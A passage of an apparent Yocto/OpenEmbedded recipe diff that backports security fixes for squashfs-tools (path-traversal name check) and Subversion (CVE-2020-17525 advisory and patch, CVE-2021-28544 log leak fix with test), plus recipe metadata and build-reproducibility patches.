+diff --git a/squashfs-tools/unsquash-1234.c b/squashfs-tools/unsquash-1234.c
+new file mode 100644
+index 00000000..c2d4f42b
+--- /dev/null
++++ b/squashfs-tools/unsquash-1234.c
+@@ -0,0 +1,58 @@
++/*
++ * Unsquash a squashfs filesystem.  This is a highly compressed read only
++ * filesystem.
++ *
++ * Copyright (c) 2021
++ * Phillip Lougher <phillip@squashfs.org.uk>
++ *
++ * This program is free software; you can redistribute it and/or
++ * modify it under the terms of the GNU General Public License
++ * as published by the Free Software Foundation; either version 2,
++ * or (at your option) any later version.
++ *
++ * This program is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with this program; if not, write to the Free Software
++ * Foundation, 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
++ *
++ * unsquash-1234.c
++ *
++ * Helper functions used by unsquash-1, unsquash-2, unsquash-3 and
++ * unsquash-4.
++ */
++
++#define TRUE 1
++#define FALSE 0
++/*
++ * Check name for validity, name should not
++ *  - be ".", "./", or
++ *  - be "..", "../" or
++ *  - have a "/" anywhere in the name, or
++ *  - be shorter than the expected size
++ */
++int check_name(char *name, int size)
++{
++	char *start = name;
++
++	if(name[0] == '.') {
++		if(name[1] == '.')
++			name++;
++		if(name[1] == '/' || name[1] == '\0')
++			return FALSE;
++	}
++
++	while(name[0] != '/' && name[0] != '\0')
++		name ++;
++
++	if(name[0] == '/')
++		return FALSE;
++
++	if((name - start) != size)
++		return FALSE;
++
++	return TRUE;
++}
+diff --git a/squashfs-tools/unsquash-2.c b/squashfs-tools/unsquash-2.c
+index 4b3d767e..474064e1 100644
+--- a/squashfs-tools/unsquash-2.c
++++ b/squashfs-tools/unsquash-2.c
+@@ -2,7 +2,7 @@
+  * Unsquash a squashfs filesystem.  This is a highly compressed read only
+  * filesystem.
+  *
+- * Copyright (c) 2009, 2010, 2013, 2019
++ * Copyright (c) 2009, 2010, 2013, 2019, 2021
+  * Phillip Lougher <phillip@squashfs.org.uk>
+  *
+  * This program is free software; you can redistribute it and/or
+@@ -386,6 +386,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ 			memcpy(dire->name, directory_table + bytes,
+ 				dire->size + 1);
+ 			dire->name[dire->size + 1] = '\0';
++
++			/* check name for invalid characters (i.e /, ., ..) */
++			if(check_name(dire->name, dire->size + 1) == FALSE) {
++				ERROR("File system corrupted: invalid characters in name\n");
++				goto corrupted;
++			}
++
+ 			TRACE("squashfs_opendir: directory entry %s, inode "
+ 				"%d:%d, type %d\n", dire->name,
+ 				dirh.start_block, dire->offset, dire->type);
+diff --git a/squashfs-tools/unsquash-3.c b/squashfs-tools/unsquash-3.c
+index 02c31fc5..65cfe4d9 100644
+--- a/squashfs-tools/unsquash-3.c
++++ b/squashfs-tools/unsquash-3.c
+@@ -2,7 +2,7 @@
+  * Unsquash a squashfs filesystem.  This is a highly compressed read only
+  * filesystem.
+  *
+- * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019
++ * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019, 2021
+  * Phillip Lougher <phillip@squashfs.org.uk>
+  *
+  * This program is free software; you can redistribute it and/or
+@@ -413,6 +413,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ 			memcpy(dire->name, directory_table + bytes,
+ 				dire->size + 1);
+ 			dire->name[dire->size + 1] = '\0';
++
++			/* check name for invalid characters (i.e /, ., ..) */
++			if(check_name(dire->name, dire->size + 1) == FALSE) {
++				ERROR("File system corrupted: invalid characters in name\n");
++				goto corrupted;
++			}
++
+ 			TRACE("squashfs_opendir: directory entry %s, inode "
+ 				"%d:%d, type %d\n", dire->name,
+ 				dirh.start_block, dire->offset, dire->type);
+diff --git a/squashfs-tools/unsquash-4.c b/squashfs-tools/unsquash-4.c
+index 8475835c..aa23a841 100644
+--- a/squashfs-tools/unsquash-4.c
++++ b/squashfs-tools/unsquash-4.c
+@@ -2,7 +2,7 @@
+  * Unsquash a squashfs filesystem.  This is a highly compressed read only
+  * filesystem.
+  *
+- * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019
++ * Copyright (c) 2009, 2010, 2011, 2012, 2013, 2019, 2021
+  * Phillip Lougher <phillip@squashfs.org.uk>
+  *
+  * This program is free software; you can redistribute it and/or
+@@ -349,6 +349,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ 			memcpy(dire->name, directory_table + bytes,
+ 				dire->size + 1);
+ 			dire->name[dire->size + 1] = '\0';
++
++			/* check name for invalid characters (i.e /, ., ..) */
++			if(check_name(dire->name, dire->size + 1) == FALSE) {
++				ERROR("File system corrupted: invalid characters in name\n");
++				goto corrupted;
++			}
++
+ 			TRACE("squashfs_opendir: directory entry %s, inode "
+ 				"%d:%d, type %d\n", dire->name,
+ 				dirh.start_block, dire->offset, dire->type);
+diff --git a/squashfs-tools/unsquashfs.h b/squashfs-tools/unsquashfs.h
+index 934618b2..db1da7a0 100644
+--- a/squashfs-tools/unsquashfs.h
++++ b/squashfs-tools/unsquashfs.h
+@@ -4,7 +4,7 @@
+  * Unsquash a squashfs filesystem.  This is a highly compressed read only
+  * filesystem.
+  *
+- * Copyright (c) 2009, 2010, 2013, 2014, 2019
++ * Copyright (c) 2009, 2010, 2013, 2014, 2019, 2021
+  * Phillip Lougher <phillip@squashfs.org.uk>
+  *
+  * This program is free software; you can redistribute it and/or
+@@ -261,4 +261,7 @@ extern int read_ids(int, long long, long long, unsigned int **);
+ 
+ /* unsquash-34.c */
+ extern long long *alloc_index_table(int);
++
++/* unsquash-1234.c */
++extern int check_name(char *, int);
+ #endif
diff --git a/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb b/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb
index b06951df36..5d754b20b3 100644
--- a/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb
+++ b/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb
@@ -1,14 +1,17 @@
 # Note, we can probably remove the lzma option as it has be replaced with xz,
 # and I don't think the kernel supports it any more.
 SUMMARY = "Tools for manipulating SquashFS filesystems"
+HOMEPAGE = "https://github.com/plougher/squashfs-tools"
+DESCRIPTION = "Tools to create and extract Squashfs filesystems."
 SECTION = "base"
 LICENSE = "GPL-2"
 LIC_FILES_CHKSUM = "file://../COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
 
 PV = "4.4"
 SRCREV = "52eb4c279cd283ed9802dd1ceb686560b22ffb67"
-SRC_URI = "git://github.com/plougher/squashfs-tools.git;protocol=https \
+SRC_URI = "git://github.com/plougher/squashfs-tools.git;protocol=https;branch=master \
            file://0001-squashfs-tools-fix-build-failure-against-gcc-10.patch;striplevel=2 \
+           file://CVE-2021-40153.patch;striplevel=2 \
 "
 
 S = "${WORKDIR}/git/squashfs-tools"
diff --git a/meta/recipes-devtools/strace/strace/run-ptest b/meta/recipes-devtools/strace/strace/run-ptest
index 4660207220..3a51fb0be9 100755
--- a/meta/recipes-devtools/strace/strace/run-ptest
+++ b/meta/recipes-devtools/strace/strace/run-ptest
@@ -1,5 +1,5 @@
 #!/bin/sh
-export TIMEOUT_DURATION=120
+export TIMEOUT_DURATION=240
 chown nobody tests
 chown nobody tests/*
 chown nobody ../ptest
diff --git a/meta/recipes-devtools/strace/strace_5.5.bb b/meta/recipes-devtools/strace/strace_5.5.bb
index ae552da028..4121cfcce7 100644
--- a/meta/recipes-devtools/strace/strace_5.5.bb
+++ b/meta/recipes-devtools/strace/strace_5.5.bb
@@ -1,5 +1,6 @@
 SUMMARY = "System call tracing tool"
 HOMEPAGE = "http://strace.io"
+DESCRIPTION = "strace is a diagnostic, debugging and instructional userspace utility for Linux. It is used to monitor and tamper with interactions between processes and the Linux kernel, which include system calls, signal deliveries, and changes of process state."
 SECTION = "console/utils"
 LICENSE = "LGPL-2.1+ & GPL-2+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=c756d9d5dabc27663df64f0bf492166c"
diff --git a/meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch b/meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch
new file mode 100644
index 0000000000..5bebde2a86
--- /dev/null
+++ b/meta/recipes-devtools/subversion/subversion/CVE-2020-17525.patch
@@ -0,0 +1,117 @@
+Upstream-Status: Backport [ https://subversion.apache.org/security/CVE-2020-17525-advisory.txt ] 
+CVE: CVE-2020-17525
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+  Remote unauthenticated denial-of-service in Subversion mod_authz_svn.
+
+Summary:
+========
+
+  Subversion's mod_authz_svn module will crash if the server is using
+  in-repository authz rules with the AuthzSVNReposRelativeAccessFile
+  option and a client sends a request for a non-existing repository URL.
+
+  This can lead to disruption for users of the service.
+
+Known vulnerable:
+=================
+
+  mod_dav_svn+mod_authz_svn servers 1.9.0 through 1.10.6 (inclusive).
+  mod_dav_svn+mod_authz_svn servers 1.11.0 through 1.14.0 (inclusive).
+
+Known fixed:
+============
+
+  mod_dav_svn+mod_authz_svn servers 1.14.1
+  mod_dav_svn+mod_authz_svn servers 1.10.7
+
+Details:
+========
+
+  A null-pointer-dereference has been found in mod_authz_svn that results in
+  a remote unauthenticated Denial-of-Service in some server configurations.
+
+  The vulnerability can be triggered by an unauthenticated user if the
+  Apache HTTPD server is configured to use an in-repository authz file,
+  with configuration directives such as:
+
+    AuthzSVNAccessFile "^/authz"
+    AuthzSVNReposRelativeAccessFile "^/authz"
+
+  The problem originates when sending a GET request to a non-existent
+  repository. The mod_authz_svn module will attempt to find authz rules
+  at a path within the requested SVN repository. Upon constructing this
+  path, the function svn_repos_find_root_path will return a NULL pointer
+  since the requested repository does not exist on-disk.
+  A check for this legitimate NULL pointer condition is missing, which
+  results in a segmentation fault when the NULL pointer is used.
+
+  The in-repository authz feature was first introduced in Subversion 1.8:
+  https://subversion.apache.org/docs/release-notes/1.8.html#in-repo-authz
+
+  The missing NULL check was first introduced during refactoring of the
+  authz code during development work leading up to Subversion 1.9.
+  Subversion 1.8 servers are unaffected.
+
+Severity:
+=========
+
+  CVSSv3 Base Score: 7.5 (High)
+
+  CVSSv3 Base Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+
+  Exploitation results in denial of service by crashing the HTTPD worker
+  handling the request. The impact of this differs depending on how the
+  Apache HTTPD server is configured, including the choice of MPM (Multi-
+  Processing-Module). If the worker shares its memory address space with
+  the main thread, as is the case with e.g. the Event MPM, the entire
+  HTTPD server process will terminate. If the pre-fork MPM is used, the
+  worker will terminate but the HTTPD server will stay up, and service
+  availability will depend on how frequently the attacker is able to
+  send malicious requests which target the vulnerability.
+
+Recommendations:
+================
+
+  We recommend all users to upgrade to a known fixed release of the
+  Subversion mod_dav_svn server.
+
+  Users who are unable to upgrade may apply the included patches.
+
+  As a workaround, the use of in-repository authz rules files with
+  the AuthzSVNReposRelativeAccessFile can be avoided by switching
+  to an alternative configuration which fetches an authz rules file
+  from the server's filesystem, rather than from an SVN repository.
+
+References:
+===========
+
+  CVE-2020-17525 (Subversion)
+
+Reported by:
+============
+
+  Thomas Ã…kesson, simonsoft.se
+
+Patches:
+========
+
+  Patch for Subversion 1.10, 1.14:
+
+[[[
+Index: subversion/libsvn_repos/config_file.c
+===================================================================
+--- a/subversion/libsvn_repos/config_file.c	(revision 1883994)
++++ b/subversion/libsvn_repos/config_file.c	(working copy)
+@@ -237,6 +237,10 @@ get_repos_config(svn_stream_t **stream,
+     {
+       /* Search for a repository in the full path. */
+       repos_root_dirent = svn_repos_find_root_path(dirent, scratch_pool);
++      if (repos_root_dirent == NULL)
++        return svn_error_trace(handle_missing_file(stream, checksum, access,
++                                                   url, must_exist,
++                                                   svn_node_none));
+ 
+       /* Attempt to open a repository at repos_root_dirent. */
+       SVN_ERR(svn_repos_open3(&access->repos, repos_root_dirent, NULL,
+]]]
diff --git a/meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch b/meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch
new file mode 100644
index 0000000000..030ead6c66
--- /dev/null
+++ b/meta/recipes-devtools/subversion/subversion/CVE-2021-28544.patch
@@ -0,0 +1,146 @@
+From 61382fd8ea66000bd9ee8e203a6eab443220ee40 Mon Sep 17 00:00:00 2001
+From: Nathan Hartman <hartmannathan@apache.org>
+Date: Sun, 27 Mar 2022 05:59:18 +0000
+Subject: [PATCH] On the 1.14.x-r1899227 branch: Merge r1899227 from trunk
+ w/testlist variation
+
+git-svn-id: https://svn.apache.org/repos/asf/subversion/branches/1.14.x-r1899227@1899229 13f79535-47bb-0310-9956-ffa450edef68
+
+CVE: CVE-2021-28544 [https://github.com/apache/subversion/commit/61382fd8ea66000bd9ee8e203a6eab443220ee40]
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ subversion/libsvn_repos/log.c           | 26 +++++-------
+ subversion/tests/cmdline/authz_tests.py | 55 +++++++++++++++++++++++++
+ 2 files changed, 65 insertions(+), 16 deletions(-)
+
+diff --git a/subversion/libsvn_repos/log.c b/subversion/libsvn_repos/log.c
+index d9a1fb1085e16..41ca8aed27174 100644
+--- a/subversion/libsvn_repos/log.c
++++ b/subversion/libsvn_repos/log.c
+@@ -337,42 +337,36 @@ detect_changed(svn_repos_revision_access_level_t *access_level,
+       if (   (change->change_kind == svn_fs_path_change_add)
+           || (change->change_kind == svn_fs_path_change_replace))
+         {
+-          const char *copyfrom_path = change->copyfrom_path;
+-          svn_revnum_t copyfrom_rev = change->copyfrom_rev;
+-
+           /* the following is a potentially expensive operation since on FSFS
+              we will follow the DAG from ROOT to PATH and that requires
+              actually reading the directories along the way. */
+           if (!change->copyfrom_known)
+             {
+-              SVN_ERR(svn_fs_copied_from(&copyfrom_rev, &copyfrom_path,
++              SVN_ERR(svn_fs_copied_from(&change->copyfrom_rev, &change->copyfrom_path,
+                                         root, path, iterpool));
+               change->copyfrom_known = TRUE;
+             }
+ 
+-          if (copyfrom_path && SVN_IS_VALID_REVNUM(copyfrom_rev))
++          if (change->copyfrom_path && SVN_IS_VALID_REVNUM(change->copyfrom_rev))
+             {
+-              svn_boolean_t readable = TRUE;
+-
+               if (callbacks->authz_read_func)
+                 {
+                   svn_fs_root_t *copyfrom_root;
++                  svn_boolean_t readable;
+ 
+                   SVN_ERR(svn_fs_revision_root(&copyfrom_root, fs,
+-                                               copyfrom_rev, iterpool));
++                                               change->copyfrom_rev, iterpool));
+                   SVN_ERR(callbacks->authz_read_func(&readable,
+                                                      copyfrom_root,
+-                                                     copyfrom_path,
++                                                     change->copyfrom_path,
+                                                      callbacks->authz_read_baton,
+                                                      iterpool));
+                   if (! readable)
+-                    found_unreadable = TRUE;
+-                }
+-
+-              if (readable)
+-                {
+-                  change->copyfrom_path = copyfrom_path;
+-                  change->copyfrom_rev = copyfrom_rev;
++                    {
++                      found_unreadable = TRUE;
++                      change->copyfrom_path = NULL;
++                      change->copyfrom_rev = SVN_INVALID_REVNUM;
++                    }
+                 }
+             }
+         }
+diff --git a/subversion/tests/cmdline/authz_tests.py b/subversion/tests/cmdline/authz_tests.py
+index 760cb3663d02f..92e8a5e1935c9 100755
+--- a/subversion/tests/cmdline/authz_tests.py
++++ b/subversion/tests/cmdline/authz_tests.py
+@@ -1731,6 +1731,60 @@ def empty_group(sbox):
+                                      '--username', svntest.main.wc_author,
+                                      sbox.repo_url)
+ 
++@Skip(svntest.main.is_ra_type_file)
++def log_inaccessible_copyfrom(sbox):
++  "log doesn't leak inaccessible copyfrom paths"
++
++  sbox.build(empty=True)
++  sbox.simple_add_text('secret', 'private')
++  sbox.simple_commit(message='log message for r1')
++  sbox.simple_copy('private', 'public')
++  sbox.simple_commit(message='log message for r2')
++
++  svntest.actions.enable_revprop_changes(sbox.repo_dir)
++  # Remove svn:date and svn:author for predictable output.
++  svntest.actions.run_and_verify_svn(None, [], 'propdel', '--revprop',
++                                     '-r2', 'svn:date', sbox.repo_url)
++  svntest.actions.run_and_verify_svn(None, [], 'propdel', '--revprop',
++                                     '-r2', 'svn:author', sbox.repo_url)
++
++  write_restrictive_svnserve_conf(sbox.repo_dir)
++
++  # First test with blanket access.
++  write_authz_file(sbox,
++                   {"/" : "* = rw"})
++  expected_output = svntest.verify.ExpectedOutput([
++    "------------------------------------------------------------------------\n",
++    "r2 | (no author) | (no date) | 1 line\n",
++    "Changed paths:\n",
++    "   A /public (from /private:1)\n",
++    "\n",
++    "log message for r2\n",
++    "------------------------------------------------------------------------\n",
++  ])
++  svntest.actions.run_and_verify_svn(expected_output, [],
++                                     'log', '-r2', '-v',
++                                     sbox.repo_url)
++
++  # Now test with an inaccessible copy source (/private).
++  write_authz_file(sbox,
++                   {"/" : "* = rw"},
++                   {"/private" : "* ="})
++  expected_output = svntest.verify.ExpectedOutput([
++    "------------------------------------------------------------------------\n",
++    "r2 | (no author) | (no date) | 1 line\n",
++    "Changed paths:\n",
++    # The copy is shown as a plain add with no copyfrom info.
++    "   A /public\n",
++    "\n",
++    # No log message, as the revision is only partially visible.
++    "\n",
++    "------------------------------------------------------------------------\n",
++  ])
++  svntest.actions.run_and_verify_svn(expected_output, [],
++                                     'log', '-r2', '-v',
++                                     sbox.repo_url)
++
+ 
+ ########################################################################
+ # Run the tests
+@@ -1771,6 +1825,7 @@ def empty_group(sbox):
+               inverted_group_membership,
+               group_member_empty_string,
+               empty_group,
++              log_inaccessible_copyfrom,
+              ]
+ serial_only = True
+ 
diff --git a/meta/recipes-devtools/subversion/subversion_1.13.0.bb b/meta/recipes-devtools/subversion/subversion_1.13.0.bb
index b3c44ca9b9..5643191569 100644
--- a/meta/recipes-devtools/subversion/subversion_1.13.0.bb
+++ b/meta/recipes-devtools/subversion/subversion_1.13.0.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Subversion (svn) version control system client"
 HOMEPAGE = "http://subversion.apache.org"
+DESCRIPTION = "Subversion is an open source version control system."
 SECTION = "console/network"
 LICENSE = "Apache-2 & MIT"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=6487ae7094d359fa90fb9c4096e52e2b"
@@ -11,6 +12,8 @@ SRC_URI = "${APACHE_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
            file://disable_macos.patch \
            file://0001-Fix-libtool-name-in-configure.ac.patch \
            file://serfmacro.patch \
+           file://CVE-2020-17525.patch \
+           file://CVE-2021-28544.patch \
            "
 
 SRC_URI[md5sum] = "3004b4dae18bf45a0b6ea4ef8820064d"
diff --git a/meta/recipes-devtools/swig/swig/determinism.patch b/meta/recipes-devtools/swig/swig/determinism.patch
new file mode 100644
index 0000000000..8ffb4bce8e
--- /dev/null
+++ b/meta/recipes-devtools/swig/swig/determinism.patch
@@ -0,0 +1,19 @@
+Remove the compiler commandline/platform from the compiled binary as this
+breaks reproducibilty.
+
+Upstream-Status: Inappropriate [OE reproducibiity fix upstream unlikely to take]
+RP 2021/3/1
+
+
+Index: swig-3.0.12/Source/Modules/main.cxx
+===================================================================
+--- swig-3.0.12.orig/Source/Modules/main.cxx
++++ swig-3.0.12/Source/Modules/main.cxx
+@@ -636,7 +636,6 @@ void SWIG_getoptions(int argc, char *arg
+ 	}
+       } else if (strcmp(argv[i], "-version") == 0) {
+ 	fprintf(stdout, "\nSWIG Version %s\n", Swig_package_version());
+-	fprintf(stdout, "\nCompiled with %s [%s]\n", SWIG_CXX, SWIG_PLATFORM);
+ 	fprintf(stdout, "\nConfigured options: %cpcre\n",
+ #ifdef HAVE_PCRE
+ 		'+'
diff --git a/meta/recipes-devtools/swig/swig_3.0.12.bb b/meta/recipes-devtools/swig/swig_3.0.12.bb
index 45026c9700..090aaa8112 100644
--- a/meta/recipes-devtools/swig/swig_3.0.12.bb
+++ b/meta/recipes-devtools/swig/swig_3.0.12.bb
@@ -6,6 +6,7 @@ SRC_URI += "file://0001-Use-proc-self-exe-for-swig-swiglib-on-non-Win32-plat.pat
             file://swig-3.0.12-Coverity-fix-issue-reported-for-SWIG_Python_FixMetho.patch \
             file://Python-Fix-new-GCC8-warnings-in-generated-code.patch \
             file://0001-Fix-generated-code-for-constant-expressions-containi.patch \
+            file://determinism.patch \
            "
 SRC_URI[md5sum] = "82133dfa7bba75ff9ad98a7046be687c"
 SRC_URI[sha256sum] = "7cf9f447ae7ed1c51722efc45e7f14418d15d7a1e143ac9f09a668999f4fc94d"
diff --git a/meta/recipes-devtools/syslinux/syslinux/determinism.patch b/meta/recipes-devtools/syslinux/syslinux/determinism.patch
new file mode 100644
index 0000000000..2fb8c64df3
--- /dev/null
+++ b/meta/recipes-devtools/syslinux/syslinux/determinism.patch
@@ -0,0 +1,22 @@
+In order to build deterministic binaries, we need to sort the wildcard expansion
+so the libraries are linked in the same order each time. This fixes reproducibility
+issues within syslinux builds.
+
+Upstream-Status: Pending
+RP 2021/3/1
+
+Index: syslinux-6.04-pre2/mk/lib.mk
+===================================================================
+--- syslinux-6.04-pre2.orig/mk/lib.mk
++++ syslinux-6.04-pre2/mk/lib.mk
+@@ -130,8 +130,8 @@ LIBENTRY_OBJS = \
+ 	exit.o
+ 
+ LIBGCC_OBJS = \
+-	  $(patsubst $(com32)/lib/%.c,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.c)) \
+-	  $(patsubst $(com32)/lib/%.S,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.S))
++	  $(sort $(patsubst $(com32)/lib/%.c,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.c))) \
++	  $(sort $(patsubst $(com32)/lib/%.S,%.o,$(wildcard $(com32)/lib/$(ARCH)/libgcc/*.S)))
+ 
+ LIBCONSOLE_OBJS = \
+ 	\
diff --git a/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb b/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb
index 3e7eef3a75..a5618327bf 100644
--- a/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb
+++ b/meta/recipes-devtools/syslinux/syslinux_6.04-pre2.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Multi-purpose linux bootloader"
 HOMEPAGE = "http://www.syslinux.org/"
+DESCRIPTION = "The Syslinux Project covers lightweight bootloaders for MS-DOS FAT filesystems (SYSLINUX), network booting (PXELINUX), bootable "El Torito" CD-ROMs (ISOLINUX), and Linux ext2/ext3/ext4 or btrfs filesystems (EXTLINUX). The project also includes MEMDISK, a tool to boot legacy operating systems (such as DOS) from nontraditional media; it is usually used in conjunction with PXELINUX and ISOLINUX."
 LICENSE = "GPLv2+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
                     file://README;beginline=35;endline=41;md5=558f2c71cb1fb9ba511ccd4858e48e8a"
@@ -22,11 +23,16 @@ SRC_URI = "https://www.zytor.com/pub/syslinux/Testing/6.04/syslinux-${PV}.tar.xz
            file://0009-linux-syslinux-implement-install_bootblock.patch \
            file://0010-Workaround-multiple-definition-of-symbol-errors.patch \
            file://0001-install-don-t-install-obsolete-file-com32.ld.patch \
+           file://determinism.patch \
            "
 
 SRC_URI[md5sum] = "2b31c78f087f99179feb357da312d7ec"
 SRC_URI[sha256sum] = "4441a5d593f85bb6e8d578cf6653fb4ec30f9e8f4a2315a3d8f2d0a8b3fadf94"
 
+# remove at next version upgrade or when output changes
+PR = "r1"
+HASHEQUIV_HASH_VERSION .= ".1"
+
 UPSTREAM_CHECK_URI = "https://www.zytor.com/pub/syslinux/"
 UPSTREAM_CHECK_REGEX = "syslinux-(?P<pver>.+)\.tar"
 UPSTREAM_VERSION_UNKNOWN = "1"
diff --git a/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb b/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb
index a7a1f0ff1a..e1233ffde0 100644
--- a/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb
+++ b/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_233.bb
@@ -1,8 +1,14 @@
+SUMMARY = "Boot performance graphing tool"
+DESCRIPTION = "For systemd-bootchart, several proc debug interfaces are required in the kernel config: \
+  CONFIG_SCHEDSTATS \
+below is optional, for additional info: \
+  CONFIG_SCHED_DEBUG"
+HOMEPAGE = "https://github.com/systemd/systemd-bootchart"
 LICENSE = "LGPLv2.1 & GPLv2"
 LIC_FILES_CHKSUM = "file://LICENSE.LGPL2.1;md5=4fbd65380cdd255951079008b364516c \
                     file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe"
 
-SRC_URI = "git://github.com/systemd/systemd-bootchart.git;protocol=https \
+SRC_URI = "git://github.com/systemd/systemd-bootchart.git;protocol=https;branch=master \
            file://0001-architecture-Recognise-RISCV-32-RISCV-64.patch \
            file://mips64.patch \
 "
diff --git a/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb b/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb
index ed14fe66b1..b671956cc8 100644
--- a/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb
+++ b/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Target Communication Framework for the Eclipse IDE"
 HOMEPAGE = "http://wiki.eclipse.org/TCF"
+DESCRIPTION = "TCF is a vendor-neutral, lightweight, extensible network protocol mainly for communicating with embedded systems (targets)."
 BUGTRACKER = "https://bugs.eclipse.org/bugs/"
 
 LICENSE = "EPL-1.0 | EDL-1.0"
@@ -9,7 +10,7 @@ SRCREV = "a022ef2f1acfd9209a1bf792dda14ae4b0d1b60f"
 PV = "1.7.0+git${SRCPV}"
 
 UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
-SRC_URI = "git://git.eclipse.org/gitroot/tcf/org.eclipse.tcf.agent \
+SRC_URI = "git://git.eclipse.org/r/tcf/org.eclipse.tcf.agent.git;protocol=https;branch=master \
            file://fix_ranlib.patch \
            file://ldflags.patch \
            file://tcf-agent.init \
diff --git a/meta/recipes-devtools/tcltk/tcl_8.6.10.bb b/meta/recipes-devtools/tcltk/tcl_8.6.10.bb
index aedd96b021..35a91b4f09 100644
--- a/meta/recipes-devtools/tcltk/tcl_8.6.10.bb
+++ b/meta/recipes-devtools/tcltk/tcl_8.6.10.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Tool Command Language"
 HOMEPAGE = "http://tcl.sourceforge.net"
+DESCRIPTION = "Tool Command Language, is an open-source multi-purpose C library which includes a powerful dynamic scripting language. Together they provide ideal cross-platform development environment for any programming project."
 SECTION = "devel/tcltk"
 
 # http://www.tcl.tk/software/tcltk/license.html
@@ -32,6 +33,7 @@ SRC_URI_class-native = "${BASE_SRC_URI}"
 
 S = "${WORKDIR}/${BPN}${PV}/unix"
 
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/${BPN}${PV}"
 VER = "${PV}"
 
 inherit autotools ptest binconfig update-alternatives
diff --git a/meta/recipes-devtools/unfs3/unfs3_git.bb b/meta/recipes-devtools/unfs3/unfs3_git.bb
index d60cee87c9..d1b3fb8f57 100644
--- a/meta/recipes-devtools/unfs3/unfs3_git.bb
+++ b/meta/recipes-devtools/unfs3/unfs3_git.bb
@@ -2,6 +2,7 @@ SUMMARY = "Userspace NFS server v3 protocol"
 DESCRIPTION = "UNFS3 is a user-space implementation of the NFSv3 server \
 specification. It provides a daemon for the MOUNT and NFS protocols, which \
 are used by NFS clients for accessing files on the server."
+HOMEPAGE = "https://github.com/unfs3/unfs3"
 SECTION = "console/network"
 LICENSE = "unfs3"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=9475885294e17c0cc0067820d042792e"
@@ -13,7 +14,7 @@ DEPENDS_append_class-nativesdk = " flex-nativesdk"
 ASNEEDED = ""
 
 S = "${WORKDIR}/git"
-SRC_URI = "git://github.com/unfs3/unfs3.git;protocol=https \
+SRC_URI = "git://github.com/unfs3/unfs3.git;protocol=https;branch=master \
            file://unfs3_parallel_build.patch \
            file://alternate_rpc_ports.patch \
            file://fix_pid_race_parent_writes_child_pid.patch \
@@ -35,7 +36,7 @@ BBCLASSEXTEND = "native nativesdk"
 inherit autotools
 EXTRA_OECONF_append_class-native = " --sbindir=${bindir}"
 CFLAGS_append = " -I${STAGING_INCDIR}/tirpc"
-LDFLAGS_append = " -ltirpc"
+EXTRA_OECONF_append = " LIBS=-ltirpc"
 
 # Turn off these header detects else the inode search
 # will walk entire file systems and this is a real problem
diff --git a/meta/recipes-devtools/unifdef/unifdef_2.12.bb b/meta/recipes-devtools/unifdef/unifdef_2.12.bb
index 22b10ba234..b42051b8b6 100644
--- a/meta/recipes-devtools/unifdef/unifdef_2.12.bb
+++ b/meta/recipes-devtools/unifdef/unifdef_2.12.bb
@@ -2,6 +2,7 @@ SUMMARY = "Selectively remove #ifdef statements from sources"
 SECTION = "devel"
 LICENSE = "BSD-2-Clause"
 HOMEPAGE = "http://dotat.at/prog/unifdef/"
+DESCRIPTION = "The unifdef utility selectively processes conditional C preprocessor #if and #ifdef directives. It removes from a file both the directives and the additional text that they delimit, while otherwise leaving the file alone."
 
 LIC_FILES_CHKSUM = "file://COPYING;md5=3498caf346f6b77934882101749ada23 \
                     file://unifdef.c;endline=32;md5=6f4ee8085d6e6ab0f7cb4390e1a9c497 \
diff --git a/meta/recipes-devtools/vala/vala.inc b/meta/recipes-devtools/vala/vala.inc
index 703ed1aa8d..71da2ef07c 100644
--- a/meta/recipes-devtools/vala/vala.inc
+++ b/meta/recipes-devtools/vala/vala.inc
